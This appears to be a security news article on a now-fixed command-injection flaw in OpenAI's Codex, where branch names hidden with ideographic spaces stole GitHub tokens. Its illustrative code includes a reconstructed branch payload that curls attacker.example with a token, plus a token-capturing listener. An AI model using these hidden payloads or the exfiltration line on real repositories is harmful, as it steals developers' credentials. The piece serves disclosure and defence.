- A Carefully Crafted Branch Name Can Steal Your GitHub Auth Token
- Unicode spaces hide malicious payloads from human eyes in plain sight
- Attackers can automate token theft from multiple users sharing a repository
Security researchers have discovered a command injection vulnerability in OpenAI’s Codex cloud environment that allowed attackers to steal GitHub authentication tokens using nothing more than a carefully crafted branch name.
Research by BeyondTrust Phantom Labs traced the vulnerability to improper input sanitization in the way Codex processed GitHub branch names during task execution.
By injecting arbitrary commands via the branch name parameter, an attacker could execute malicious payloads inside the agent container and retrieve sensitive authentication tokens that grant access to connected GitHub repositories.
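The underlying bug class is classic command injection: untrusted input reaching a shell unquoted. The sketch below is purely illustrative (the function name and command are hypothetical, not OpenAI's actual code), showing how a branch name interpolated into a shell string lets an attacker terminate the intended command and append their own.

```python
import subprocess

# Hypothetical sketch of the vulnerable pattern: a branch name is
# interpolated directly into a shell command string. Names and the
# command itself are illustrative, not taken from Codex internals.
def checkout(branch_name: str) -> str:
    # Unsafe: branch_name reaches the shell unquoted.
    result = subprocess.run(
        f"echo git checkout {branch_name}",
        shell=True, capture_output=True, text=True,
    )
    return result.stdout

# A crafted branch name ends the intended command and runs its own.
malicious = "main; echo INJECTED"
print(checkout(malicious))
```

The fix is equally classic: pass arguments as a list (no shell), or validate ref names before use.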
A vulnerability in sight
What makes this attack particularly concerning is the method researchers developed to hide the malicious payload from human detection.
The team identified a way to disguise the payload using ideographic space, a Unicode character designated U+3000.
By adding 94 ideographic spaces followed by “or true” to the branch name, error conditions can be avoided and the malicious payload rendered invisible in the Codex UI.
Bash ignores ideographic spaces during command execution, so the payload still runs, while the characters effectively hide the attack from any user viewing the branch name through the web portal.
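A rough reconstruction of such a branch name can be built in a few lines. The injected command below is hypothetical (the research does not publish the exact payload); what matters is the structure: payload, then 94 U+3000 characters, then the error-suppressing tail, all inside a single ref name.

```python
# Illustrative reconstruction of the obfuscated branch name described
# in the research. The injected command is hypothetical; only the
# structure (payload + 94 x U+3000 + "or true") follows the write-up.
IDEOGRAPHIC_SPACE = "\u3000"

injected = 'feature"; curl http://attacker.example/?t=$TOKEN; #'  # hypothetical
branch = injected + IDEOGRAPHIC_SPACE * 94 + "or true"

# The padding pushes the visible tail out of view in many UIs,
# but every character is still present in the ref name.
print(branch.count(IDEOGRAPHIC_SPACE))
```

Note that U+3000 is not an ASCII space, so git's ref-name rules do not reject it the way they would a normal space character.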
The attack could be automated to compromise multiple users interacting with a shared GitHub repository.
With the proper repository permissions, an attacker could create a new branch containing the obfuscated payload and even set that branch as the default branch for the repository.
Any user who subsequently interacted with that branch through Codex would have their GitHub OAuth token exfiltrated to an external server controlled by the attacker.
The researchers tested this technique by hosting a simple HTTP server on Amazon EC2 to monitor incoming requests, confirming that the stolen tokens were successfully transmitted.
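A stand-in for that monitoring setup fits in a few lines of Python (the researchers' actual EC2 configuration is not described in detail; this is a minimal sketch): an HTTP server that records every request path, which is where an exfiltrated token would land.

```python
import http.server
import threading
import urllib.request

# Minimal stand-in for the researchers' monitoring server: log every
# incoming request path, where an exfiltrated token would appear.
captured = []

class Logger(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        captured.append(self.path)  # e.g. /?token=gho_...
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):  # silence default stderr logging
        pass

server = http.server.HTTPServer(("127.0.0.1", 0), Logger)
threading.Thread(target=server.serve_forever, daemon=True).start()

# Simulate the request a payload might make (token value is fake).
port = server.server_address[1]
urllib.request.urlopen(f"http://127.0.0.1:{port}/?token=FAKE_TOKEN").read()
server.shutdown()
print(captured)
```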
The vulnerability affected several Codex interfaces, including the ChatGPT website, the Codex CLI, the Codex SDK, and the Codex IDE extension.
Phantom Labs also discovered that authentication tokens stored locally on developers’ machines in the auth.json file could be leveraged to replicate the attack via backend APIs.
Beyond simple token theft, the same technique could steal access tokens for the GitHub App installation by referencing Codex in a pull request comment, which triggers a code review container that executes the payload.
All reported issues have since been fixed in coordination with the OpenAI security team.
However, the discovery raises concerns about AI coding agents operating with privileged access.
Traditional security tools, such as antivirus and firewalls, cannot prevent this attack because it occurs within the OpenAI cloud environment, beyond their visibility.
To stay secure, organizations should audit the permissions of AI tools, especially agents, and enforce least privilege.
They should also monitor repositories for unusual branch names containing Unicode spaces, rotate GitHub tokens regularly, and review access logs for suspicious API activity.
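The branch-name monitoring step is easy to automate. A minimal sketch (the character set and branch source are assumptions; in practice the names would come from something like `git branch -r --format="%(refname:short)"`):

```python
# Sketch of the suggested monitoring step: flag branch names that
# contain non-ASCII space characters such as U+3000 (ideographic
# space). The character set below is an illustrative starting point.
SUSPICIOUS_SPACES = {"\u3000", "\u00a0", "\u2007", "\u202f"}

def suspicious_branches(names):
    """Return branch names containing any suspicious space character."""
    return [n for n in names if any(ch in SUSPICIOUS_SPACES for ch in n)]

# Example input; real names would come from the repository's ref list.
branches = ["main", "feature/login", "fix\u3000\u3000; curl evil"]
print(suspicious_branches(branches))
```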